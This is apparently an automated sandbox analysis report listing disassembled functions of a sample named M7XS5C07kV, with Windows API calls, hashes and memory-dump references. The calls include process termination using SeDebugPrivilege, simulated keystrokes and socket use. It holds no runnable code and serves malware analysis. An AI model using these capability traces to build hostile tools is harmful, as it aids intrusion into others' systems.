Part of subcall function 0063466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00633697,?), ref: 006346A4

Part of subcall function 00634A31: GetFileAttributesW.KERNEL32(?,0063370B), ref: 00634A32

lstrcmpiW.KERNEL32(?,?), ref: 00634D40
_wcscmp.LIBCMT ref: 00634D5A
MoveFileW.KERNEL32(?,?), ref: 00634D75

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: ce3f77e69e64fc9075b49465298b93a8c2f7ebd7cc5ab2bfebaa71d80050ee03
Instruction ID: ba6c2cc7fefe4eacafb971057d0fa1f1187e06cd5ea3311706a16dff2d80fdad
Opcode Fuzzy Hash: ce3f77e69e64fc9075b49465298b93a8c2f7ebd7cc5ab2bfebaa71d80050ee03
Instruction Fuzzy Hash: AD5142B20083859BC764DBA4D8859DFB7EDAF85350F00092FB685D3151EE34A689C796

Function 005D2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0060C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0060C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0060C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0060C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0060C370
DestroyIcon.USER32(00000000), ref: 0060C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0060C39C
DestroyIcon.USER32(?), ref: 0060C3AB

Part of subcall function 0065A4AF: DeleteObject.GDI32(00000000), ref: 0065A4E8

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 37b21f2073d827eb7bd64f4600f234478b657fa51554c4c8f0e036c0be54a3fe
Instruction ID: bbca3955d1917919b89a63d7547ecfb3722f7c5cc4020d5509f06752cca66566
Opcode Fuzzy Hash: 37b21f2073d827eb7bd64f4600f234478b657fa51554c4c8f0e036c0be54a3fe
Instruction Fuzzy Hash: A6515C70A50205AFDB24DF68CC45FAA7BA6FB58321F10462AF912D77E0D7B0AD90DB50

Function 0062966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0062A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0062A84C
Part of subcall function 0062A82C: GetCurrentThreadId.KERNEL32 ref: 0062A853
Part of subcall function 0062A82C: AttachThreadInput.USER32(00000000,?,00629683,?,00000001), ref: 0062A85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 0062968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006296AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 006296AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 006296B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 006296D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006296D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 006296E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 006296F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 006296FB

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: f3e30cb182ecb22c1aa7c4248221c844fdf6c9398d0129c47177f53947b1924d
Instruction ID: 71067a461693237a576ba1b995e1fb315582ac14bebcba728c4f04526fdde3bf
Opcode Fuzzy Hash: f3e30cb182ecb22c1aa7c4248221c844fdf6c9398d0129c47177f53947b1924d
Instruction Fuzzy Hash: B811A571950A18BFF710AF60DC49F6A7B5EDB4C751F111429F344AB0A0C9F25C51DAA8

Function 00628921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0062853C,00000B00,?,?), ref: 0062892A
HeapAlloc.KERNEL32(00000000,?,0062853C,00000B00,?,?), ref: 00628931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0062853C,00000B00,?,?), ref: 00628946
GetCurrentProcess.KERNEL32(?,00000000,?,0062853C,00000B00,?,?), ref: 0062894E
DuplicateHandle.KERNEL32(00000000,?,0062853C,00000B00,?,?), ref: 00628951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0062853C,00000B00,?,?), ref: 00628961
GetCurrentProcess.KERNEL32(0062853C,00000000,?,0062853C,00000B00,?,?), ref: 00628969
DuplicateHandle.KERNEL32(00000000,?,0062853C,00000B00,?,?), ref: 0062896C
CreateThread.KERNEL32(00000000,00000000,00628992,00000000,00000000,00000000), ref: 00628986

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: efefc9f1531bb5c810189e5200bb7c4c47a47ed4186a493734931e7b674f14f8
Instruction ID: 8a3c0d93ac7aabb08963a82c0f83ea699b2086590708c6c4fd4fd08e4628bfcc
Opcode Fuzzy Hash: efefc9f1531bb5c810189e5200bb7c4c47a47ed4186a493734931e7b674f14f8
Instruction Fuzzy Hash: E401BBB5640708FFE720EBA5DC4DF6B3BADEB89711F419421FA05DB1A1CA709800CB21

Function 0064975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 0062710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00627044,80070057,?,?,?,00627455), ref: 00627127
Part of subcall function 0062710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00627044,80070057,?,?), ref: 00627142
Part of subcall function 0062710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00627044,80070057,?,?), ref: 00627150
Part of subcall function 0062710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00627044,80070057,?), ref: 00627160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00649806
_memset.LIBCMT ref: 00649813
_memset.LIBCMT ref: 00649956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00649982
CoTaskMemFree.OLE32(?), ref: 0064998D

Strings

NULL Pointer assignment, xrefs: 006499DB

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 66cd5b5bb6277fb523b4feb0c8f8007ee9c784fd4b709394fb277468dea62b75
Instruction ID: 2e059ecc7234c1c55c40bc65dead1e65b4c805eb59bdfcd3b3c0d9e40e6f7076
Opcode Fuzzy Hash: 66cd5b5bb6277fb523b4feb0c8f8007ee9c784fd4b709394fb277468dea62b75
Instruction Fuzzy Hash: DB913871D00229EBDB20DFA4DC45EDEBBBABF49310F10415AF419A7291EB719A44CFA0

Function 00656D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00656E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00656E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00656E52
_wcscat.LIBCMT ref: 00656EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00656EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00656EF2

Strings

SysListView32, xrefs: 00656DF6

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 91175b0239ec1683a7da0c356119fe3a125b0a2444312b52c5e27aa8dad2d83f
Instruction ID: eeca7aa9fbd3e78709557746bccf4bb717402e5ada7cdda1e029a3c135e1b8fe
Opcode Fuzzy Hash: 91175b0239ec1683a7da0c356119fe3a125b0a2444312b52c5e27aa8dad2d83f
Instruction Fuzzy Hash: D941A470A00349ABDB21DFA4CC85BEE77FAEF08351F50052AF945E7291D6719D88CB60

Function 0064E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00633C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00633C7A
Part of subcall function 00633C55: Process32FirstW.KERNEL32(00000000,?), ref: 00633C88
Part of subcall function 00633C55: CloseHandle.KERNEL32(00000000), ref: 00633D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0064E9A4
GetLastError.KERNEL32 ref: 0064E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0064E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 0064EA63
GetLastError.KERNEL32(00000000), ref: 0064EA6E
CloseHandle.KERNEL32(00000000), ref: 0064EAA3

Strings

SeDebugPrivilege, xrefs: 0064E9C2

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: d6fb689231cc965118451542c6f6be5f3abd0e89e3c12083a118dd3c64e700ca
Instruction ID: 298c4ccc8f467772cb7bb6b7a2ea4180b952ba7b6756905c908d7b38059d1e4e
Opcode Fuzzy Hash: d6fb689231cc965118451542c6f6be5f3abd0e89e3c12083a118dd3c64e700ca
Instruction Fuzzy Hash: E541AD312002019FDB24EF14DC99FADBBA6BF80714F04845DF9429B3D2CB75A844CB95

Function 00657291 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006572AA
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00657351
IsMenu.USER32(?), ref: 00657369
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006573B1
DrawMenuBar.USER32 ref: 006573C4

Strings

P[, xrefs: 00657311, 0065732C
0, xrefs: 0065729E

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0$P[
API String ID: 3866635326-4179529919
Opcode ID: aa212fee725ee2944328be8417599d285684d3ec0721801b4ade1e1b71d47301
Instruction ID: 1e4be891554db9ffa0b1ceefe85d62f6871b084c7cb413038342eb55416384db
Opcode Fuzzy Hash: aa212fee725ee2944328be8417599d285684d3ec0721801b4ade1e1b71d47301
Instruction Fuzzy Hash: 7B411675A04209EFDB20DF50E884ADABBBAFF04362F149529FD159B350D730AD58DB50

Function 00632F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00633033

Strings

blank, xrefs: 00632FB5
stop, xrefs: 00633004
warning, xrefs: 0063301C
question, xrefs: 00632FEC
info, xrefs: 00632FD4

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 59c7cf8f5126bfca3212f9876fe0697f0a3d49216c09e21324a65229e8d08f24
Instruction ID: 569a9ceb411dd7fd13ac8a4665a9a054c6e49ff3496a46be364a529cd243f116
Opcode Fuzzy Hash: 59c7cf8f5126bfca3212f9876fe0697f0a3d49216c09e21324a65229e8d08f24
Instruction Fuzzy Hash: C911D53168C35BBEE718AA54DC82CBB6B9D9F15360F20002AFA00A6382DB655F4157E5

Function 006342F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00634312
LoadStringW.USER32(00000000), ref: 00634319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0063432F
LoadStringW.USER32(00000000), ref: 00634336
_wprintf.LIBCMT ref: 0063435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0063437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00634357

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: d9dc5fb2c1de618679b32b81d5f22a39e1d1d715785f64f7212bf6d8265ec5a4
Instruction ID: f5e5533d04c624fc6caccdf120241ea083d159d298e7e219b8fbc1405166cfd9
Opcode Fuzzy Hash: d9dc5fb2c1de618679b32b81d5f22a39e1d1d715785f64f7212bf6d8265ec5a4
Instruction Fuzzy Hash: 41014FF2900308BFE711EBA0DD89EEB776DEB08301F4005A1BB45E2151EA745E854B70

Function 005D2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0060C1C7,00000004,00000000,00000000,00000000), ref: 005D2ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0060C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 005D2B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0060C1C7,00000004,00000000,00000000,00000000), ref: 0060C21A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0060C1C7,00000004,00000000,00000000,00000000), ref: 0060C286

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 9b32027a858f0408e8a1da2269fe57b90c9bd22736784bd335deba934d54014c
Instruction ID: 3e54c4c6a038c28f2d800501e333b59dcbee7bbacc192b15d25cbd9fed1f5994
Opcode Fuzzy Hash: 9b32027a858f0408e8a1da2269fe57b90c9bd22736784bd335deba934d54014c
Instruction Fuzzy Hash: 7D4118307087809ADB399B2C9C9CB6B7F97FBA5310F58891FE04786BA1C6B19981D710

Function 006370C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 006370DD

Part of subcall function 005F0DB6: std::exception::exception.LIBCMT ref: 005F0DEC
Part of subcall function 005F0DB6: __CxxThrowException@8.LIBCMT ref: 005F0E01

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00637114
EnterCriticalSection.KERNEL32(?), ref: 00637130
_memmove.LIBCMT ref: 0063717E
_memmove.LIBCMT ref: 0063719B
LeaveCriticalSection.KERNEL32(?), ref: 006371AA
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006371BF
InterlockedExchange.KERNEL32(?,000001F6), ref: 006371DE

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 67c7ca22a43450ed94eb5da522ac7da889e0884746fc004812c278ccd4871f09
Instruction ID: bd0ca76b2a18d72e3569ff886fda3b915d0d1be1ac0fbd075476d92e92148c37
Opcode Fuzzy Hash: 67c7ca22a43450ed94eb5da522ac7da889e0884746fc004812c278ccd4871f09
Instruction Fuzzy Hash: 80315076900205EBCF10DFA4DC899AABB79FF45711F1841A5FA049B256DB349A10CBA0

Function 006561D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 006561EB
GetDC.USER32(00000000), ref: 006561F3
GetDeviceCaps.GDI32(00000000,0000005A), ref: 006561FE
ReleaseDC.USER32(00000000,00000000), ref: 0065620A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00656246
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00656257
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0065902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00656291
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 006562B1

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 8a09fc3f9f3655a998db91f9dc0a1f6f4edba3552a40c62d99c3b09d10e91d41
Instruction ID: 76b9d3c7325efb7dda0329271576ea521585d9dba245c8eab4792090d4a5cc84
Opcode Fuzzy Hash: 8a09fc3f9f3655a998db91f9dc0a1f6f4edba3552a40c62d99c3b09d10e91d41
Instruction Fuzzy Hash: 3D317F72101210BFEB118F50CC8AFEB3BAAEF49766F044065FE089A291C6759C41CB74

Function 0063EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 005D9837: __itow.LIBCMT ref: 005D9862
Part of subcall function 005D9837: __swprintf.LIBCMT ref: 005D98AC

Part of subcall function 005EFC86: _wcscpy.LIBCMT ref: 005EFCA9

_wcstok.LIBCMT ref: 0063EC94
_wcscpy.LIBCMT ref: 0063ED23
_memset.LIBCMT ref: 0063ED56

Strings

X, xrefs: 0063ED93

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 6de1966098e731096935c318454c8f109b0352f547f8de8ec682ffdeb6ce53df
Instruction ID: 06377f2a22f4721e58a31c202a519f9f644822fc3ad82e901b89b9caeaa5fe12
Opcode Fuzzy Hash: 6de1966098e731096935c318454c8f109b0352f547f8de8ec682ffdeb6ce53df
Instruction Fuzzy Hash: ABC182715087059FC724EF28C845A6ABBE5FF85310F04492EF999973A2DB31EC45CB92

Function 00646B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00646C00
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00646C21
WSAGetLastError.WSOCK32(00000000), ref: 00646C34
htons.WSOCK32(?,?,?,00000000,?), ref: 00646CEA
inet_ntoa.WSOCK32(?), ref: 00646CA7

Part of subcall function 0062A7E9: _strlen.LIBCMT ref: 0062A7F3
Part of subcall function 0062A7E9: _memmove.LIBCMT ref: 0062A815

_strlen.LIBCMT ref: 00646D44
_memmove.LIBCMT ref: 00646DAD

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: c3c6d17b2b112ba21a2d0ce1b81498169b7cda0020de655c5590769cd6ccfe9e
Instruction ID: 40591351f802a2aa86dda60b8ab163e577984fba69bc3abe619a433469813e80
Opcode Fuzzy Hash: c3c6d17b2b112ba21a2d0ce1b81498169b7cda0020de655c5590769cd6ccfe9e
